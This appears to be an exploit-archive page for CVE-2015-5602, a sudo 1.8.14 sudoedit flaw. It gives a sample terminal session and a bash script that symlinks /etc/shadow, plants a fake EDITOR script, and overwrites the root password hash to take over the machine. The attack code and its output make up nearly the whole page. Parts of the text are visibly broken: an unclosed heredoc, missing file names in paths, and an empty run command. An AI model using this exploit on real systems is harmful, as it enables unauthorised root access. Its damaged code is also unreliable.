Sudo <=1.8.14

Sudo <=1.8.14 Local Privilege Escalation -

[user@test tmp]$ sudo -l
sudo -l
Matching Defaults entries for samantha on cassios:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="QTDIR

User user may run the following commands on cassios:
    (root) NOPASSWD: sudoedit /home/*/*/
[user@test tmp]$ sudo --version

You need to change specified file names to can execute exploit properly.

[user@test tmp]$ ./
[+] CVE-2015-5602 exploit by t0kx
[+] Creating folder...
[+] Creating symlink
[+] Modify EDITOR...
[+] Change root password to: e7ccbd117813eee6060129d6f8c76ecb
[+] Done
[user@test tmp]$ su root
su root
Password: e7ccbd117813eee6060129d6f8c76ecb


#!/usr/bin/env bash
# CVE-2015-5602 exploit by t0kx

export EDITOR="/tmp/edit"
export FOLDER="${RANDOM}"
export PASSWD=$(printf ${RANDOM} \
		| md5sum \
		| awk '{print $1}')

prepare() {
cat << EOF >> /tmp/edit
#!/usr/bin/env bash
pass="$(printf "%q" $(openssl passwd -1 -salt ${RANDOM} ${PASSWD}))"
sed -i -e  "s,^root:[^:]\+:,root:\${pass}:," \${1}

main() {
	printf "[+] CVE-2015-5602 exploit by t0kx\n"
	printf "[+] Creating folder...\n"
	mkdir -p /home/${USER}/${FOLDER}/
	printf "[+] Creating symlink\n"
	ln -sf /etc/shadow /home/${USER}/${FOLDER}/
	printf "[+] Modify EDITOR...\n"
	prepare && chmod +x ${EDITOR}
	printf "[+] Change root password to: ${PASSWD}\n"
	sudoedit /home/${USER}/${FOLDER}/
	printf "[+] Done\n"
}; main

Last updated